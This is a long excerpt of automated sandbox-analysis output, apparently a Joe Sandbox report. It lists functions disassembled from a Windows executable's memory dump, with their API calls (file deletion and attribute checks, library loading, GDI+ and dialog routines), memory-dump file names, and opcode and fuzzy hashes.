                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,00D2A438,?,?,?,?,00D2892B,?,?,?,00D5380F,000000FF), ref: 00D2B4AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2643169976-0
                                                                              • Opcode ID: f5e8a0558c8f0a8d8673042409eac19f9d476420fee9734d5b54ee236b9a4061
                                                                              • Instruction ID: d339a860b1a168fd09cd0cca3f7a1ae5e097263eca58edb196c3bcf80208c0a5
                                                                              • Opcode Fuzzy Hash: f5e8a0558c8f0a8d8673042409eac19f9d476420fee9734d5b54ee236b9a4061
                                                                              • Instruction Fuzzy Hash: 71E022325003186BEB006B60DC40FDA335CAF1438BF084022BE04C20A1DB60DCC49A30
                                                                              Function 00D3BD81 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00D5380F,000000FF), ref: 00D3BDB5
                                                                              • CoUninitialize.COMBASE(?,?,?,?,00D5380F,000000FF), ref: 00D3BDBA
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: GdiplusShutdownUninitialize
                                                                              • String ID:
                                                                              • API String ID: 3856339756-0
                                                                              • Opcode ID: c9e4f4cabf7ee0bdc0ff14e041e39aa4a0a32b20c6cdb5f5e3dd014d54b152b6
                                                                              • Instruction ID: 1a5f122734175bb8abd7c0a93944fd2c7d0793e653425dfb10a7fee2f83f5024
                                                                              • Opcode Fuzzy Hash: c9e4f4cabf7ee0bdc0ff14e041e39aa4a0a32b20c6cdb5f5e3dd014d54b152b6
                                                                              • Instruction Fuzzy Hash: ADE06572504754EFCB109B4DDC05B09FBA9FB88B24F108266F815D3760CB747801CAB5
                                                                              Function 00D3F002 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _swprintf.LIBCMT ref: 00D3F02C
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00D3F043
                                                                                • Part of subcall function 00D3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3C769
                                                                                • Part of subcall function 00D3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3C77A
                                                                                • Part of subcall function 00D3C758: IsDialogMessageW.USER32(000204C8,?), ref: 00D3C78E
                                                                                • Part of subcall function 00D3C758: TranslateMessage.USER32(?), ref: 00D3C79C
                                                                                • Part of subcall function 00D3C758: DispatchMessageW.USER32(?), ref: 00D3C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                              • String ID:
                                                                              • API String ID: 2718869927-0
                                                                              • Opcode ID: 7418e30f63e311e3c7a6b085c868c55a4c1a4b899e83d592b6ba966a4a29b755
                                                                              • Instruction ID: c9d659220c8fc744f518ae231efbc31ec5d08e3e7256e5f403cf9922283a809b
                                                                              • Opcode Fuzzy Hash: 7418e30f63e311e3c7a6b085c868c55a4c1a4b899e83d592b6ba966a4a29b755
                                                                              • Instruction Fuzzy Hash: ACE0227241434C36DF01A764EC0AFAA3AACAB0438DF040461F640E61A2DAB4E6108F72
                                                                              Function 00D2B4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00D2B4CA,?,00D28042,?), ref: 00D2B4E4
                                                                                • Part of subcall function 00D2CF32: _wcslen.LIBCMT ref: 00D2CF56
                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,00D2B4CA,?,00D28042,?), ref: 00D2B510
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2673547680-0
                                                                              • Opcode ID: ce511e03bdf6bbbab51d5cff87a4190e0ac4188720f62d4ab567376de6fffa16
                                                                              • Instruction ID: 7f14dff5e2f47889efec83ca134f5264c6b19eb9bec738362a5704d17b59f82c
                                                                              • Opcode Fuzzy Hash: ce511e03bdf6bbbab51d5cff87a4190e0ac4188720f62d4ab567376de6fffa16
                                                                              • Instruction Fuzzy Hash: 7EE092315103686BCB20AB68EC05BDA7758EB593FAF040161FE55E72D5D770AD808AF0
                                                                              Function 00D31B3B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D31B56
                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D3063A,Crypt32.dll,00000000,00D306B4,00000200,?,00D30697,00000000,00000000,?), ref: 00D31B78
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                              • String ID:
                                                                              • API String ID: 1175261203-0
                                                                              • Opcode ID: cd0895c79cfc48c1a2089031a7b98999d778f229b6a4449ed4e5a8cd3bb480ce
                                                                              • Instruction ID: 2f03c1c937c8168a8f9fa4f91e8f2b87b0d65b79484297f06d1e64283e42b7e4
                                                                              • Opcode Fuzzy Hash: cd0895c79cfc48c1a2089031a7b98999d778f229b6a4449ed4e5a8cd3bb480ce
                                                                              • Instruction Fuzzy Hash: C0E04F76901328ABDB11ABA5DC08FDA77ACEF093C6F040065BA49D2148DA74DA84CBB0
                                                                              Function 00D3B3C8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D3B3E9
                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D3B3F0
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: BitmapCreateFromGdipStream
                                                                              • String ID:
                                                                              • API String ID: 1918208029-0
                                                                              • Opcode ID: 634aa3d41f52bbd561e4d860cdfd51f61eb13ea46f1315f828f0ef2a14ce3648
                                                                              • Instruction ID: 720475137f4f12d0c06db34fa5c3505b26e9885df8d90bb25d19f05f0c678bcc
                                                                              • Opcode Fuzzy Hash: 634aa3d41f52bbd561e4d860cdfd51f61eb13ea46f1315f828f0ef2a14ce3648
                                                                              • Instruction Fuzzy Hash: 05E0ED71900218EBCB10DF99D545799BBE8EF08361F20806AE99593700D374AE489BB1
                                                                              Function 00D43D1C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D43D3A
                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D43D45
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                              • String ID:
                                                                              • API String ID: 1660781231-0
                                                                              • Opcode ID: 3825a598d5a4de5a86f04fa1232deb8970219f5143aa709af4e44c418be6b86b
                                                                              • Instruction ID: c211c69abb56c46899043c7e933a2c88a0565354e21d77cc5d27a9f7f38d7346
                                                                              • Opcode Fuzzy Hash: 3825a598d5a4de5a86f04fa1232deb8970219f5143aa709af4e44c418be6b86b
                                                                              • Instruction Fuzzy Hash: 32D02235C08B021B9C0C32BC2C0359B1344EA21B707B01746F030EA1C1EF14C64C6131
                                                                              Function 00D212D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ItemShowWindow
                                                                              • String ID:
                                                                              • API String ID: 3351165006-0
                                                                              • Opcode ID: d47abe1c22b854559d83a8ad17ab31f9e5a4255d5ac4352b79c336f2ce300f86
                                                                              • Instruction ID: bb382458ab698cc30b161a352afcd8b8afdf34261c20939e6545754404a46d0f
                                                                              • Opcode Fuzzy Hash: d47abe1c22b854559d83a8ad17ab31f9e5a4255d5ac4352b79c336f2ce300f86
                                                                              • Instruction Fuzzy Hash: E2C01276068B01BECB010BB0EC0DE2ABBA8EBA4212F10CA08F0A6C1168C239C010DB21
                                                                              Function 00D21AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: 6d52b22d64eca1333077e2c09eb429427e5fdcc120c281077e94bf1be596f5fa
                                                                              • Instruction ID: 10e6c563cbebcfa3498dbeae6975819a74cb76a189018941734a67ee637aed61
                                                                              • Opcode Fuzzy Hash: 6d52b22d64eca1333077e2c09eb429427e5fdcc120c281077e94bf1be596f5fa
                                                                              • Instruction Fuzzy Hash: 2EC1B378A043649BDF25CF2498847AD7BA5AF75318F1C80B9EC059B386CB319A44CB71
                                                                              Function 00D242F1 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: 61d8e37b8cc2d401dc575047a9275b09ec9f31d06c20c097d01ebbe60aa1a01d
                                                                              • Instruction ID: a6caae5e21b14fb5b814ae94d2b51fe676c503d932e20c2010b62488200f5441
                                                                              • Opcode Fuzzy Hash: 61d8e37b8cc2d401dc575047a9275b09ec9f31d06c20c097d01ebbe60aa1a01d
                                                                              • Instruction Fuzzy Hash: 4471D1B1508B959FC721EB34E851AE7B7E8FF25304F08492EA5EB42181DB71B604CB31
                                                                              Function 00D290A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D290A7
                                                                                • Part of subcall function 00D213F8: __EH_prolog.LIBCMT ref: 00D213FD
                                                                                • Part of subcall function 00D22032: __EH_prolog.LIBCMT ref: 00D22037
                                                                                • Part of subcall function 00D2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2B991
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$CloseFind
                                                                              • String ID:
                                                                              • API String ID: 2506663941-0
                                                                              • Opcode ID: fc6f7dd7cb35e953e2415a9739b3424e08834d1a478e8943356c19037c156bc1
                                                                              • Instruction ID: ff7da5d2dcf6481e4ba7e30b666a36865b4c08e6989821b70e26bb7021aa217f
                                                                              • Opcode Fuzzy Hash: fc6f7dd7cb35e953e2415a9739b3424e08834d1a478e8943356c19037c156bc1
                                                                              • Instruction Fuzzy Hash: 2141A971D042749ADB25DB60D8B5AEAB379EF20348F4400EAF58A67082DB755F88CF30
                                                                              Function 00D213FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D213FD
                                                                                • Part of subcall function 00D26891: __EH_prolog.LIBCMT ref: 00D26896
                                                                                • Part of subcall function 00D2E298: __EH_prolog.LIBCMT ref: 00D2E29D
                                                                                • Part of subcall function 00D2644D: __EH_prolog.LIBCMT ref: 00D26452
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: 875440c53f3198e84d5221bf96a1706d0e9e1057c9958cbbc1c48d2ed9d7a4e7
                                                                              • Instruction ID: ae0e59bf02b80245a856dfd65b89ba259e39dca766e0b6c4974031f9b755273d
                                                                              • Opcode Fuzzy Hash: 875440c53f3198e84d5221bf96a1706d0e9e1057c9958cbbc1c48d2ed9d7a4e7
                                                                              • Instruction Fuzzy Hash: DB5125B190A3808ECB14DF2994802D9BBE5AF69304F0842BEEC5DCF69BD7755614CB72
                                                                              Function 00D213F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D213FD
                                                                                • Part of subcall function 00D26891: __EH_prolog.LIBCMT ref: 00D26896
                                                                                • Part of subcall function 00D2E298: __EH_prolog.LIBCMT ref: 00D2E29D
                                                                                • Part of subcall function 00D2644D: __EH_prolog.LIBCMT ref: 00D26452
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: a72d7241536956639de273b897da5b78f387a5780938c9fb256e24691f20bc63
                                                                              • Instruction ID: 89268d0c54019a4d4aa3bd9ea86de4c33577fc68a08ed348adf4b56a5fd3d814
                                                                              • Opcode Fuzzy Hash: a72d7241536956639de273b897da5b78f387a5780938c9fb256e24691f20bc63
                                                                              • Instruction Fuzzy Hash: FF5143B190A3808ECB14DF6894802D9BBE1AF29304F0802BEEC5DCF68BD7754214CB72
                                                                              Function 00D347AD Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: aa214cb0eafa78524847bba6f447c4dd8455a517794f5be0de457c6e71e1603e
                                                                              • Instruction ID: 415cc9869750809688ed626722c34b1c5420496d3fca484d7d0685ce442083ad
                                                                              • Opcode Fuzzy Hash: aa214cb0eafa78524847bba6f447c4dd8455a517794f5be0de457c6e71e1603e
                                                                              • Instruction Fuzzy Hash: D32107B2E41711AFDB14DF74CC4166B7AA8FF04314F04013AE605EB681E374AD00C6B8
                                                                              Function 00D3C217 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D3C21C
                                                                                • Part of subcall function 00D213F8: __EH_prolog.LIBCMT ref: 00D213FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
